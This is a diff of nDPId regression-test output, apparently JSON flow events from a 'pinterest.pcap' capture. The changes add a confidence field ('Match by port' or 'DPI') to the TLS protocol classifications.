-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00720{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1605289716168,"flow_last_seen":1605289716373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":32185,"flow_avg_l4_payload_len":643,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2003","src_port":43562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726582,"flow_last_seen":1605289726637,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47682,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605289715274,"flow_last_seen":1605289715612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":12420,"flow_tot_l4_payload_len":67017,"flow_avg_l4_payload_len":943,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a03:2880:f030:13:face:b00c::3","src_port":51292,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00607{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718346,"flow_last_seen":1605289718372,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":56940,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
-00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Media"}}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00728{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":12778,"flow_first_seen":1605289714142,"flow_last_seen":1605289717307,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":65236,"flow_tot_l4_payload_len":20138391,"flow_avg_l4_payload_len":1576,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38512,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":343,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38514,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38516,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38518,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714258,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00718{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605289714142,"flow_last_seen":1605289714259,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":389,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38522,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1605289732959,"flow_last_seen":1605289733342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":26978,"flow_avg_l4_payload_len":518,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"}}
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1605289715966,"flow_last_seen":1605289733391,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6358,"flow_avg_l4_payload_len":115,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200a","src_port":47790,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
+00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":808,"flow_first_seen":1605289714782,"flow_last_seen":1605289715303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16656,"flow_tot_l4_payload_len":1781636,"flow_avg_l4_payload_len":2204,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::720","src_port":57050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}}
+00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714251,"flow_last_seen":1605289714288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:13e2","src_port":34626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00628{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00727{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":116,"flow_first_seen":1605289715221,"flow_last_seen":1605289715740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":16912,"flow_tot_l4_payload_len":133002,"flow_avg_l4_payload_len":1146,"midstream":0,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54416,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00664{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00608{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289714250,"flow_last_seen":1605289714281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289710318,"flow_last_seen":1605289710576,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33164,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
